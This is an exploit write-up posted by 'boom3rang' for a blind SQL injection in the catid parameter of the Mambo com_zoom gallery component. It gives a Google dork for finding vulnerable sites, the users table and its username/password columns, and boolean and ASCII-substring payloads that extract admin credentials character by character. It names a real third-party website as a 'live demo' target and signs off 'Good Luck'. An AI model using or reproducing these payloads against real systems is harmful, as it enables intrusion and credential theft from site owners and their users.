Mambo component com_zoom (catid) Blind SQL injection Red n'black i dress eagle on my chest. It's good to be an ALBANIAN Keep my head up high for that flag i die. Im proud to be an ALBANIAN ###### Author : boom3rang Contact : boom3rang[at]live.com Greetz : H!tm@N - KHG - cHs R.I.P redc00de ------------------------------------------------------------------- Affected software description <name>zoom</name> <creationDate>20/01/2004</creationDate> <author>Mike de Boer</author> <authorEmail>mailme@mikedeboer.nl</authorEmail> <authorUrl>www.mikedeboer.nl</authorUrl> <version>2.0</version> ------------------------------------------------------------------- [~] SQLi : http://www.TARGET.com/index.php?option=com_zoom&Itemid=0&catid=[SQLi] [~]Google Dork : inurl:com_zoom inurl:"imgid" ------------------------------------------------------------------- [~] Table_NAME = mos_users [~] Column_NAME = username - password ------------------------------------------------------------------- [~] Admin Path : http://www.TARGET.com/administrator === = POC = === [~] Live Demo: ttp://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=1/* --> True ttp://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=2/* --> False ------------------------------------------------------------------- [~] ASCII index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>96 ------------------------------------------------------------------- [~] Live Demo ASCII True http://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>96 False http://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>97 Like we see, the first charter of username is 'a' char(97)=a Now you can change the second limit to find other charters, Good Luck... note: <name>zoom</name> <creationDate>20/01/2004</creationDate> <author>Mike de Boer</author> <authorEmail>mailme@mikedeboer.nl</authorEmail> <authorUrl>www.mikedeboer.nl</authorUrl> <version>2.0</version>